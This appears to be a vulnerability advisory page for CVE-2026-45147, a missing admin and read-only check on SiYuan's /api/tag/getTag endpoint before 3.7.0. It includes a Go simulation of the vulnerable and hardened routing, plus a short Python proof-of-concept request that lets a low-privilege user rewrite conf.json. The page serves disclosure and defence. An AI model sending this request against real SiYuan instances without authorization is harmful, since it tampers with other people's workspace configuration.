Security Vulnerability Report
CVE-2026-45147 CVSS 4.3 MEDIUM

CVE-2026-45147

Published: 2026-05-14 19:16:39
Last Modified: 2026-05-14 21:22:56

Description

SiYuan is an open-source personal knowledge management system. Prior to 3.7.0, POST /api/tag/getTag is registered with model.CheckAuth only, omitting both model.CheckAdminRole and model.CheckReadonly, despite the handler performing a configuration write that is normally guarded by both. Any authenticated user — including publish-service RoleReader accounts and RoleEditor accounts on a read-only workspace — can call this endpoint with a sort argument to mutate model.Conf.Tag.Sort and trigger model.Conf.Save(), which atomically rewrites the entire workspace conf.json. This vulnerability is fixed in 3.7.0.
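To make the registration gap concrete, the following is an added illustration written for this page, not SiYuan's own gin router or middleware: a net/http model of a CheckAuth / CheckAdminRole / CheckReadonly chain, with /api/tag/getTag registered once the pre-3.7.0 way (CheckAuth only) and once with the two omitted guards. The X-Role header, the HTTP status codes, the Conf stand-in and its field names are assumptions made for the example; the real kernel derives the role from the session.

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strconv"
	"strings"
)

// Conf stands in for model.Conf (assumed shape): only the tag sort mode and
// the read-only flag are modelled, and Saves counts calls to Save(), i.e.
// how often conf.json would have been rewritten.
type Conf struct {
	TagSort  int
	ReadOnly bool
	Saves    int
}

func (c *Conf) Save() { c.Saves++ }

var conf = &Conf{}

// SetReadOnly toggles the workspace flag that checkReadonly enforces.
func SetReadOnly(ro bool) { conf.ReadOnly = ro }

// roleFromRequest reads the caller's role from an X-Role header (assumption
// for a self-contained example; SiYuan uses the session). ok=false means
// unauthenticated.
func roleFromRequest(r *http.Request) (string, bool) {
	switch role := r.Header.Get("X-Role"); role {
	case "admin", "editor", "reader":
		return role, true
	}
	return "", false
}

type middleware func(http.Handler) http.Handler

// checkAuth only asks "is there a session at all?"; every role passes.
func checkAuth(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if _, ok := roleFromRequest(r); !ok {
			http.Error(w, "unauthenticated", http.StatusUnauthorized)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// checkAdminRole rejects every role except the administrator.
func checkAdminRole(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if role, _ := roleFromRequest(r); role != "admin" {
			http.Error(w, "admin role required", http.StatusForbidden)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// checkReadonly rejects writes while the workspace is read-only.
func checkReadonly(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if conf.ReadOnly {
			http.Error(w, "workspace is read-only", http.StatusForbidden)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// getTag follows the advisory's description: a "sort" argument in the JSON
// body overwrites Conf.Tag.Sort and triggers Conf.Save().
func getTag(w http.ResponseWriter, r *http.Request) {
	var arg map[string]interface{}
	if err := json.NewDecoder(r.Body).Decode(&arg); err != nil {
		http.Error(w, "bad json", http.StatusBadRequest)
		return
	}
	if s, ok := arg["sort"].(float64); ok {
		conf.TagSort = int(s)
		conf.Save()
	}
	w.Header().Set("Content-Type", "application/json")
	json.NewEncoder(w).Encode(map[string]interface{}{"code": 0, "data": map[string]int{"sort": conf.TagSort}})
}

// chain wraps h so that mws[0] runs first.
func chain(h http.Handler, mws ...middleware) http.Handler {
	for i := len(mws) - 1; i >= 0; i-- {
		h = mws[i](h)
	}
	return h
}

// VulnerableRouter registers the endpoint as the advisory says pre-3.7.0 did.
func VulnerableRouter() http.Handler {
	mux := http.NewServeMux()
	mux.Handle("/api/tag/getTag", chain(http.HandlerFunc(getTag), checkAuth))
	return mux
}

// HardenedRouter adds the two guards that were omitted.
func HardenedRouter() http.Handler {
	mux := http.NewServeMux()
	mux.Handle("/api/tag/getTag", chain(http.HandlerFunc(getTag), checkAuth, checkAdminRole, checkReadonly))
	return mux
}

// Probe sends the PoC-style request as role ("" = no session) and returns the
// HTTP status plus the number of conf.json rewrites it caused.
func Probe(router http.Handler, role string, sort int) (status, saves int) {
	before := conf.Saves
	body := `{"sort": ` + strconv.Itoa(sort) + `}`
	req := httptest.NewRequest(http.MethodPost, "/api/tag/getTag", strings.NewReader(body))
	if role != "" {
		req.Header.Set("X-Role", role)
	}
	rec := httptest.NewRecorder()
	router.ServeHTTP(rec, req)
	return rec.Code, conf.Saves - before
}

func main() {
	for _, role := range []string{"reader", "editor", "admin"} {
		st, n := Probe(VulnerableRouter(), role, 1)
		fmt.Printf("vulnerable %-6s -> %d, rewrites: %d\n", role, st, n)
		st, n = Probe(HardenedRouter(), role, 1)
		fmt.Printf("hardened   %-6s -> %d, rewrites: %d\n", role, st, n)
	}
}
```

Running it shows the whole bug in three lines of output: through VulnerableRouter a reader (or, with SetReadOnly(true), an editor) gets 200 and one rewrite; through HardenedRouter only an administrator on a writable workspace reaches the handler, and checkReadonly still stops the administrator once the workspace is read-only.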

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is available in the NVD record. The affected range stated in the advisory text is:

SiYuan < 3.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL (example); the SiYuan kernel listens on port 6806 by default
target_url = "http://localhost:6806/api/tag/getTag"

# Cookies representing a low-privilege authenticated user (e.g., RoleReader).
# Replace 'YOUR_SESSION_TOKEN_HERE' with a valid session cookie; the cookie
# name below is illustrative and must match the target's session cookie.
cookies = {"siyuan_session_id": "YOUR_SESSION_TOKEN_HERE"}

# The 'sort' argument is what mutates model.Conf.Tag.Sort and triggers
# model.Conf.Save(). A sort-mode integer is assumed here, since the handler
# stores the value as a number; any supplied value causes the write.
payload = {"sort": 0}

try:
    # Send POST request to the vulnerable endpoint
    response = requests.post(target_url, json=payload, cookies=cookies, timeout=10)
    if response.status_code == 200:
        print("[+] Request sent successfully. Check if conf.json was modified.")
        print("[+] Response:", response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except requests.RequestException as e:
    print(f"[-] An error occurred: {e}")
```

References

GitHub Security Advisory GHSA-6r88-8v7q-q4p2: https://github.com/siyuan-note/siyuan/security/advisories/GHSA-6r88-8v7q-q4p2
Raw JSON Data

```json
{"cve": {"id": "CVE-2026-45147", "sourceIdentifier": "[email protected]", "published": "2026-05-14T19:16:38.630", "lastModified": "2026-05-14T21:22:56.313", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SiYuan is an open-source personal knowledge management system. Prior to 3.7.0, POST /api/tag/getTag is registered with model.CheckAuth only, omitting both model.CheckAdminRole and model.CheckReadonly, despite the handler performing a configuration write that is normally guarded by both. Any authenticated user — including publish-service RoleReader accounts and RoleEditor accounts on a read-only workspace — can call this endpoint with a sort argument to mutate model.Conf.Tag.Sort and trigger model.Conf.Save(), which atomically rewrites the entire workspace conf.json. This vulnerability is fixed in 3.7.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}, {"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-6r88-8v7q-q4p2", "source": "[email protected]"}, {"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-6r88-8v7q-q4p2", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
```